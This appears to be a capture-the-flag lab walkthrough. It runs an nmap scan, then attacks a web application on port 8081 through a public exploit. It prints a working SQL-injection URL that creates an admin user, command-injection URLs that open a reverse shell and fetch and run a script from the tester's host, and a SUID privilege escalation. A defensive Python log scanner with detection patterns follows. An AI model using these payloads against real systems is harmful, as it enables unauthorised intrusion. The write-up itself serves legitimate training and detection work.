nmap
┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.159.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 00:05 UTC
Stats: 0:02:01 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 00:07 (0:00:00 remaining)
Nmap scan report for 192.168.159.57
Host is up (0.071s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.250
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)
| 256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)
|_ 256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-title: Apache HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql MariaDB (unauthorized)
8081/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: 400 Bad Request
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X|5.X (91%), Crestron 2-Series (86%), HP embedded (85%), Oracle VM Server 3.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:3.13 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:oracle:vm_server:3.4.2 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 3.13 (91%), Linux 3.10 - 4.11 (90%), Linux 3.2 - 4.9 (90%), Linux 5.1 (90%), Linux 3.18 (88%), Crestron XPanel control system (86%), Linux 3.16 (86%), HP P2000 G3 NAS device (85%), Oracle VM Server 3.4.2 (Linux 4.1) (85%), Linux 4.4 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: QUACKERJACK; OS: Unix
Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m15s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-12-05T00:07:18
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.4)
| Computer name: quackerjack
| NetBIOS computer name: QUACKERJACK\x00
| Domain name: \x00
| FQDN: quackerjack
|_ System time: 2024-12-04T19:07:19-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 70.40 ms 192.168.45.1
2 70.29 ms 192.168.45.254
3 72.42 ms 192.168.251.1
4 72.47 ms 192.168.159.57
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.69 seconds

Visit port 8081

The framework version number is visible.

Search for an exploit

https://www.exploit-db.com/exploits/49783

Tried FTP, no response.

Looked at Samba; it doesn't seem to have any shared files either.

Looks like the entry point is the CMS on 8081.



Running the exploit, we find that the script actually only half succeeded.

Why do I say that? Because it successfully created an admin user, but the RCE command did not execute.

Let me take a look at the exploit code.

From the look of it, it uses SQL injection to register an admin user.

I simply print out its payload.



Then I also print out its RCE payload.



Then run the exploit again.



It prints the user-creation payload and the RCE payload.

Create user
https://192.168.159.57:8081/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20(812,%20%27whagimrnbp%27,%20%2721232f297a57a5a743894a0e4a801fc3%27,%20%276c97424dc92f14ae78f8cc13cd08308d%27,%209,%20%27whagimrnbp@domain.com%27,%201346920339,%201);--

After running the user-creation payload, I logged in with this user and the login succeeded.

RCE
https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20%60touch%20/tmp/.ravnwxuzqe.txt%3Bsudo%20zip%20-q%20/tmp/.ravnwxuzqe.zip%20/tmp/.ravnwxuzqe.txt%20-T%20-TT%20%27/bin/sh%20-i%3E%26%20/dev/tcp/192.168.45.250/80%200%3E%261%20%23%27%60%20&ext=random

Tried the RCE payload; the page response looks like this, but the RCE really did not go through.

Then, looking closely at the RCE payload, we find it is overly complex, and it contains a sudo command, meaning that if sudo errors out, the command after it will not execute successfully.

Let's simplify the RCE code and probe again whether RCE can execute.

https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20curl%20192.168.45.250%2080%20&ext=random



This time it succeeds.

OK, so I strongly suspect it's the sudo that caused the RCE to fail.

https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=wget192.168.45.250/re3.sh%20&ext=random

https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20`wget192.168.45.250/re3.sh`%20&ext=random
https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20`bash%20./re3.sh`%20&ext=random

https://192.168.159.57:8081/lib/ajaxHandlers/ajaxArchiveFiles.php?path=bash%20./re3.sh%20&ext=random

Reverse shell received.
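As an added defender-side example (not part of the original walkthrough), this Python script flags the two request shapes used above when they show up in Apache access logs: a stacked INSERT in the searchColumn parameter of commands.inc.php, and shell metacharacters in the path parameter of ajaxArchiveFiles.php. The log lines are constructed samples; the script paths and parameter names are the ones from the page.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache combined-format log lines (sample data, not from the page); 1-2 mirror the walkthrough's requests, 3-4 are benign.
SAMPLE_LOG = """\
192.168.45.250 - - [05/Dec/2024:00:10:01 +0000] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20;INSERT%20INTO%20%60users%60%20(%60id%60)%20VALUES%20(812);-- HTTP/1.1" 200 512 "-" "python-requests/2.31"
192.168.45.250 - - [05/Dec/2024:00:11:22 +0000] "GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20%60wget%20192.168.45.250/re3.sh%60%20&ext=random HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Dec/2024:00:12:00 +0000] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Dec/2024:00:12:30 +0000] "GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=backups/2024&ext=zip HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A stacked statement after the expected column name, ending in a SQL comment.
SQLI_RE = re.compile(r";\s*(INSERT|UPDATE|DELETE|DROP|UNION|SELECT)\b.*--", re.I)
# Shell metacharacters or download/execute helpers inside what should be a filesystem path.
SHELL_RE = re.compile(r"[`;|&$]|/dev/tcp|\b(wget|curl|bash|sudo|nc)\b", re.I)

def query_params(query):
    """Split on '&' only: a raw ';' inside a value must stay part of that value."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def classify(line):
    """Return (kind, client_ip, offending_value) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    params = query_params(url.query)
    if url.path.endswith("/commands.inc.php"):
        column = params.get("searchColumn", "")
        if SQLI_RE.search(column):
            return ("sqli", m["ip"], column)
    if url.path.endswith("/ajaxArchiveFiles.php"):
        path = params.get("path", "")
        if SHELL_RE.search(path):
            return ("cmdi", m["ip"], path)
    return None

def scan(log_text):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]
```

The raw `;` in the query string is deliberately kept inside its parameter value, because the injected statement depends on it; a log parser that splits query strings on `;` as well as `&` would never see the INSERT in searchColumn.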



Privilege escalation

Found that find has the SUID bit set.



Privilege escalation succeeded.

Done in two hours.
